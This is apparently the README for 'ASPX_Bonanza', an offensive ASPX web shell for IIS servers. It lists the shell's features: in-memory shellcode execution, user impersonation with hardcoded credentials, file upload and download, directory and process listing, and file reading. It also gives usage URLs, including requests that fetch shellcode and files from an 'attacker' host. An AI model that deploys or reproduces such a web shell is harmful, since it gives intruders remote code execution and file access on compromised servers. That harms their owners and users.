ASPX_Bonanza is a multi-featured aspx shell with a unique use case. It has a few features with capabilities such as the use of executing shellcode in memory. Also, this script logs in directly with the impersonating user credentials and doesn’t require the seImpersonate privilege for the user running IIS.
impersonate_bonanza.aspx requires valid credentials to get the token and impersonate the user.
bonanza.aspx does not require credentials and will run as the current user without impersonating.
- Execute shellcode in memory
- Download and Upload files
- List directories
- Cat files
- List processes
demo.mp4
In order to impersonate the user you want, in the source code you will have to edit the username, domain & password.
https://url/impersonate_bonanza.aspx?shellcodeUrl=https://attacker/shellcode.bin
https://url/impersonate_bonanza.aspx?dir=C:\users\public
https://url/impersonate_bonanza.aspx?FileDownload=C:\users\public\FILE
https://url/impersonate_bonanza.aspx?UploadSource=https://attacker/FILE&UploadDestination=C:\users\public\FILE
https://url/impersonate_bonanza.aspx?Cat=C:\users\public\FILE
https://url/impersonate_bonanza.aspx?Process=1